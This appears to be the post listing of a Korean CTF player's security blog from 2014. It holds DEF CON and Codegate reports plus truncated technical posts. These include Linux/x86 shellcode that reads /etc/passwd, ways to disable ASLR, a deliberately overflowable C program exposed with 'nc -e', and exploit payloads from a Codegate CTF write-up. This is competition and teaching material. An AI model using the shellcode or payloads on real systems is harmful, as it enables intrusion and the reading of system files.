분류 전체보기 74

DEF CON 2014 다녀온 후기 입니다

후하데프콘은 역시 재밌지만 힘들었습니다. 해커로서 좋은 대접을 받으면서 한국을 떠나 라스베가스로 가니까 기분이 좋았어요.떨리기도 했고, 준비를 잘 못해서 불안하기도 했어요. 하지만 재밌게 했고, 여러가지를 배워갈 수 있어서 좋았어요. 본선 하위권을 했지만 뿌듯했어요. 이런 기회는 잘 오지 않거든요.덕분에 많이 배울 수 있었습니다. 데프콘에는 여러가지 행사가 많았어요. 말로만 듣던 데프콘 네트워크 스니핑 행사인 Wall of Sheep, 그리고 Lockpicking 그리고 OpenCTF와 CaptureThePacket 등의 행사가 있었어요.저희는 그냥 CTF를 하기 위해 Capture the Flag 룸으로 갔죠. 첫째날에는 7위까지 올라갔어요. 대준이의 공이 컸죠. (김대준 - Reset)eliza 바이..

카테고리 없음 2014.08.14

35byte Linux/x86 read file shellcode (using sendfile)

jmp ab:pop ebxxor ecx, ecxxor edx, edxlea eax, [ecx+5]int 0x80mov ecx, eaxxor eax, eaxmov al, 187lea ebx, [edx+1]mov si, 65535int 0x80hlta:call b"여기다가 문자열 넣기" hlt를 쓴 이유는 무한루프를 막기 위해 크래시라도 내고싶었기 때문이다."\xEB\x1A\x5B\x31\xC9\x31\xD2\x8D\x41\x05\xCD\x80\x89\xC1\x31\xC0\xB0\xBB\x8D\x5A\x01\x66\xBE\xFF\xFF\xCD\x80\xF4\xE8\xE1\xFF\xFF\xFF" + "/etc/passwd"

카테고리 없음 2014.06.17

리눅스 ASLR 해제하는 3가지 방법

1. /proc/sys/kernel/randomize_va_space 조작하기 (리눅스 옵션 조작)- 루트(uid: 0)만 가능- 모든 aslr이 해제됨. 재부팅 시 다시 돌아옴. 2. setarch linux32/linux64/i386/i486/i586/i686/`arch` -R- 현재 프로세스 및 하위 프로세스- setarch linux32 -R 로 하면 보통 됨- `arch`는 현재 쓰는 CPU로 치환됨(sh/bash 문법)- 64비트는 linux64 로 하면 그냥 됨- 64비트에서 suid, sgid 바이너리에서는 아예 적용 안됨.- ARM도 됨- 범위: 모든 라이브러리- 추가 범위(suid, sgid 바이너리 아닌 경우): 스택 ASLR- 모든 유저 가능. 권장하는 방법임.- personalit..

카테고리 없음 2014.06.09

2014 DEFCON CTF 본선 진출

문제 재미나게 풀고 본선 가니까 되게 기분이 좋네요.턱걸이긴 하지만.. 대단하신 분들이 모이셔서 문제를 같이 풀었더니 본선에 뙇! 하고 간 것 같아 아직도 어안이 벙벙해요. 저희 팀 이름은 HackingForChiMac이었구요, 치맥을 위해 해킹을 이라는 뜻이에요.B10S, CyKor(고대 동아리), 그리고 코드게이트에 나간 저희 6인 팀과 그레이해쉬 두 분이 연합해서 나갔어요. 아주 스케일이 커요. 좋았던 것 같아요.팀 이름은 크게 중요하지 않다고 생각해서 여러가지 의견이 나왔고 그 중 괜찮아보여서 뽑게 되었어요.(하지만 저는 미성년자라 맥주를 먹지 않아요) 대회 기간은 5월 17일부터 5월 18일. 미국 시간 기준이니까 저희는 5월 17일 오전 9시부터 5월 19일 오전 9시까지 대회에요. (한국 시..

카테고리 없음 2014.05.20

Codegate 2014 주니어 발표자료, 코드(바이너리), exploit

발표자료가 아주 전에 낸걸로 들어가서..그리고 댓글 남겨주세요 ㅠ 무플 방지 - 맥용 키노트 파일 - PPT로 변환함 어느분이 고맙게도 제 발표영상을 온라인에 찍어서 올려주셨어요. 감사합니다! 발표자료에 있는 "공격 대상 코드"exp.c#include #include char gbuf[128]; int main() { char buf[16]; int len = read(0, buf, 128); read(0, gbuf, 128); return 0; } 컴파일된 바이너리(CentOS) 컴파일 옵션:gcc -fno-stack-protector -m32 exp.c -o exp 데몬 실행 (리눅스)nc를 이용한 방법:nc.traditional -l -p 7777 -e ./exp또는nc -l -p 7777 -e ...

코드게이트 2014 주니어 발표를 하게 되었어요

히히어쩌다보니 이리 되었군요주니어 발표는 4월 2일날 하구요.http://codegate.org/2014_renew/html/2014_junior.asp여기서 발표 일정을 확인하실 수 있어요. 저는 1시 30분에 "동적 링커를 이용한 ASLR+DEP 우회 RTL 방법" 에 대해 발표를 하는데요.약간 뭐 기법 비슷한 주제라 그리 흥미롭진 않을 수 있어요.시스템 해킹에 관심있으신 분들이라면 보시면 좋을 것 같아요. 다시 보는 사진:

Codegate 2014 weird_snus 풀이

2위 브릭쓰루찍어서 기분 좋은 문제.아주 간단한 UAF인데 인자를 조작하기위해서 스택을 띄우는 코드를 썼다. 익스플로잇은 아래와 같다.mkdir "/tmp/aaa"mkdir `python -c 'print "/tmp/aaa\xf0/"'`mkdir `python -c 'print "/tmp/aaa\xf0/\x0f\x40\x38\x8c\x04\x08\x84\x95\x04\x08"'`(python -c 'print "\x00";print "hello";print "D";print("/tmp/aaa\xf0\x2f\x0f\x40\x38\x8c\x04\x08\x84\x95\x04\x08");print "A";print "M";print "G\x10\x00\x00\x00";print "A"';cat)|./weird_..

writeup 2014.02.25